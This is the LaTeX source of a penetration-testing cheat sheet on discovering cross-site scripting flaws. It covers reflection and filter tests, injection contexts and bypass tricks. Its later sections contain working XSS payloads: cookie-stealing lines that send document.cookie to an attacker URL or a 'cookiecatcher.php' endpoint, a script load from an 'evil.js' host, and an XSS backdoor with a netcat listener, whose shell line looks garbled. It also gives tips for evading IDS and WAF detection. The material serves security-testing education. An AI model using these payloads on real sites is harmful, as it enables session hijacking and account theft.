\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{binca}
\pdfinfo{
/Title (xss-discovery.pdf)
/Creator (Cheatography)
/Author (binca)
/Subject (XSS Discovery Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{3AA32A}
\definecolor{LightBackground}{HTML}{F2F9F1}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
\SetRowColor{DarkBackground}
\vspace{-7pt}
{\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
\hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
}
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
\vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{XSS Discovery Cheat Sheet}}}} \\
\normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13434/}}}
\end{tabulary}
\end{multicols}}
\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
\SetRowColor{FootBackground}
\mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\
\vspace{-2pt}binca \\
\uline{cheatography.com/binca} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
\SetRowColor{FootBackground}
\mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\
\vspace{-2pt}Not Yet Published.\\
Updated 9th November, 2017.\\
Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
\SetRowColor{FootBackground}
\mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\
\SetRowColor{white}
\vspace{-5pt}
%\includegraphics[width=48px,height=48px]{dave.jpeg}
Measure your website readability!\\
www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns
% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.
\begin{multicols*}{2}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Discovery Tests}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Various types of payloads should be used in discovery.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Reflection tests}} use simple but unique strings to determine if the input is reflected. {\bf{86868686}}} \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Filter tests}} use characters to determine if there is filtering or encoding present.
{\bf{\textless{} \textgreater{} ( ) = ' " / ; {[} {]} \$ -{}- \# \& // }}} \tn
% Row Count 8 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{POC payloads}} are inputs that attempt to demonstrate the presence of XSS: {\bf{\textless{}script\textgreater{}alert("Hello!");\textless{}/script\textgreater{}}}} \tn
% Row Count 11 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{XSS Injection Points}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Any user-controllable app input could prove vulnerable.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Submit innocuous but unique strings that allow for identification of our input in the response} \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Entry points include: \newline {\bf{URL query parameter}} \newline {\bf{POST parameters}} \newline {\bf{HTTP headers including User-Agent, Referer, Cookie}}} \tn
% Row Count 7 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Reflection Tests}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Reflected XSS provides an immediate response in which the input is reflected.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Stored XSS may not be immediately rendered and can be in a totally different area of the app.} \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Unique variations of the input should be used to allow for easier identification of input resulting in XSS.} \tn
% Row Count 7 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Common XSS Injection Contexts}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Injection context is understanding the contextual details of the response containing our input. It is critical to having JavaScript execute where our input lands.} \tn
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Most common XSS injection contexts: HTML, Tag attribute, and existing JavaScript code} \tn
% Row Count 6 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{HTML Considerations}}: The payload can be self-contained and doesn't require a particular prefix or suffix due to the context.} \tn
% Row Count 9 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Tag Attribute Considerations}}: The prefix option is to close the value assignment and possibly close the tag {\bf{"\textgreater{}}}. Suffix usage depends on the injected tags.} \tn
% Row Count 13 (+ 4)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Existing JavaScript Considerations}}: Suffix options include the JS line terminator {\bf{;}} and the single-line comment delimiter {\bf{//}}. The input will often be within a JS function, so a closing parenthesis {\bf{)}} might also be needed.} \tn
% Row Count 18 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{HTML Example \newline
Payload: {\bf{\textless{}img src="x" onerror=alert("attack!");/\textgreater{}}} \newline
Resulting HTML: \textless{}div\textgreater{}\textless{}p\textgreater{}Are you ready?
\textless{}img src="x" onerror=alert("attack!");/\textgreater{}\textless{}/p\textgreater{}\textless{}/div\textgreater{} \newline \newline
Tag Attribute Example \newline
Event Injection: {\bf{868686" onload="alert(86)}} \newline
Resultant HTML: \textless{}input type="text" name="xss" value="868686" onload="alert(86)"\textgreater{} \newline \newline
Existing JavaScript Example \newline
Payload: {\bf{86";alert(86);//}} \newline
Resultant HTML: \textless{}script\textgreater{}var \seqsplit{Variable="86";alert(86);//";} \textless{}/script\textgreater{}} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Filter Tests and Bypass/Evasion}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Discovering injection points that yield immediate or delayed reflection does not by itself mean there is an XSS vulnerability.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The next step would be to test for the presence and efficacy of filtering and encoding, as these are increasingly common} \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Most filtering utilizes blacklisting, leaving room for evasion or bypass.} \tn
% Row Count 7 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Goal is to determine whether and how filter/encoding is employed for successfully crafting XSS payloads.} \tn
% Row Count 10 (+ 3)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Target XSS payloads that specifically do NOT require filtered characters.}}} \tn
% Row Count 12 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Craft the payload to escape filter logic.}}} \tn
% Row Count 13 (+ 1)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Encode the data to confuse or bypass the filter.}}} \tn
% Row Count 15 (+ 2)
% Row 7
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The {\bf{\textless{}script\textgreater{}}} tag is one of the most commonly filtered tags, and next the angle brackets, but events can reference JavaScript without these. {\bf{DOM Event Handlers}} sometimes provide a bypass, such as using {\bf{onerror}} with a broken link.} \tn
% Row Count 20 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Browser False Negatives}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{XSS payload execution depends on the particular vendor and version of the browser.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Most major browsers now have built-in XSS filtering capabilities. When testing for XSS a tester must make sure the browser isn't blocking the attack payload.} \tn
% Row Count 6 (+ 4)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Options: \newline {\bf{Use Firefox until it has an active XSS filter (it uses the Content-Security-Policy HTTP header, but that is not a formal standard)}} \newline {\bf{Use an older browser, though this can cause issues in rendering HTML5 or non-eval() JSON parsing}} \newline {\bf{Fully disable XSS filtering}}} \tn
% Row Count 12 (+ 6)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Remember the browser is not the focus of the assessment.} \tn
% Row Count 14 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{POC Payloads}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{There are prepared fuzzing payload collections including {\bf{Fuzzdb, JBroFuzz (part of ZAP), Burp, ZAP (JBroFuzz/fuzzdb), and XSSer}}} \tn
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Considerations
should be made for stealth, by decreasing speed and changing payloads detection by IDS and WAFs can be reduced.} \tn
% Row Count 6 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Upgrades to alert( )}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{POC will be a static alert(x), confirm(x) or prompt(x, y)} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate domain application context with {\bf{alert(document.domain)}} or {\bf{confirm(document.domain)}}} \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate session/content abuses with {\bf{document.cookie}} or {\bf{forged in-session Requests}} or {\bf{defacement}}} \tn
% Row Count 8 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate external JavaScript loading with {\bf{src="//security.org/evil.js"}}} \tn
% Row Count 10 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate advanced user attacks with framework through the use of {\bf{BruteLogic XSS Shell, BeEF, Metasploit escalation, etc.}}} \tn
% Row Count 13 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Session Hijacking}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Achieved by stealing the tokens for a user's active session and reusing them.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Injected script is presented from the same origin as the session token, which allows for interaction directly with the page's DOM.} \tn
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Key properties, methods and events for session
hijacking: \newline {\bf{document.cookie}} is the most common target \newline {\bf{document.URL}} query parameter \newline {\bf{document.forms}} are hidden form fields and CSRF tokens} \tn
% Row Count 10 (+ 5)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Using {\bf{location}} to send data to a server we control {\bf{will redirect}} the victim's browser which makes the attack more obvious. \newline Example: {\bf{location='URL'+document.cookie, \seqsplit{location.replace('URL'+document}.cookie)}}} \tn
% Row Count 15 (+ 5)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Instead of using location, the {\bf{fetch() API and function}} may also be used.} \tn
% Row Count 17 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Note: {\bf{document.location}} and {\bf{window.location}} are relatively interchangeable.} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Session Theft Without Redirection}} \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{For less obvious session theft create a broken image that points to the cookie catching JavaScript.} \tn
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{\textless{}script\textgreater{}img=new Image(); \seqsplit{img.src='url/cookiecatcher.php?='+document}.cookie'\textless{}/script\textgreater{}}}} \tn
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{This assumes the {\bf{HttpOnly}} flag is not set; HttpOnly restricts cookie access to HTTP requests, so script cannot read the cookie through document.cookie.} \tn
% Row Count 7 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Leveraging HTTPS can help bypass egress filtering, and it means there is no issue with a Secure flag.} \tn
% Row Count 9 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{BruteLogic Interactive XSS Backdoor}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{XSS Injection \newline % Row Count 1 (+ 1)
\textless{}svg \seqsplit{onload=setInterval(function()} \{d=document; \seqsplit{z=d.createElement("script");} z.src="URI"; d.body.appendChild(z)\}, 0)\textgreater{} \newline % Row Count 4 (+ 3)
Shell Controller (Terminal on Attacker Machine) \newline % Row Count 5 (+ 1)
while: ; to printf "j \$; read c; echo \$c | nc -lvvp 1234 \textgreater{} /dev/null; done% Row Count 7 (+ 2)
} \tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}
% That's all folks
\end{multicols*}
\end{document}